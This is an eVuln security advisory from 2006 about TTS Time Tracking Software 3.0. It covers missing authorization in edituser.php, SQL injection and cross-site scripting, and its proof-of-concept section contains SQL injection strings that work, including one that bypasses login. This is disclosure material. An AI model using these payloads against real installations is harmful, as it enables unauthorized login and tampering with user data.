Multiple Vulnerabilities in Time Tracking Software
Summary
- Vulnerability
- Multiple Vulnerabilities in Time Tracking Software
- Discovered
- 2006.02.08
- Last Update
- 2006.02.18 Exploitation code published
- ID
- EV0069
- CVE
- CVE-2006-0689 CVE-2006-0690 CVE-2006-0691
- Risk Level
- medium
- Type
- Multiple Vulnerabilities
- Status
- Unpatched. No reply from developer(s)
- Vendor
- TTS Software
- Vulnerable Software
- Time Tracking Software (http://schedulingmanagement.com/download-time-tracking-software-now.php)
- Version
- 3.0
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
Multiple Vulnerabilities found in Time Tracking Software (http://schedulingmanagement.com/download-time-tracking-software-now.php) script.
1. Unauthorized data modification is possible.
Script edituser.php dont checks name and password and allows to modify data of any user.
2. Multiple SQL Injections
Most of user defined data isn't properly sanitized. This can be used to bypass authentication or make any SQL query by injecting arbitrary SQL code.
3. Cross-Site Scripting
UserName value in Registration Form is not properly sanitized. This can be used to insert arbitrary HTML or JavaScript code.
PoC/Exploit
1. Unauthorized data modifications.
http://host/timetracking/edituser.php?num=[userid]
2a. SQL Injection Example
http://host/timetracking/edituser.php?num=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13/*
2b. Authentication Bypass Example
Url: http://host/timetracking/login.php
Name: any
Password: ' union select 1,2,3,4,5,6,7,8,9,10,11,12,13/*
3. Cross-Site Scripting Example
Url: http://host/timetracking/register.php
User Name: <XSS>
Solution.
Solution for "Multiple Vulnerabilities in Time Tracking Software" is not available. Check TTS Software website for updates.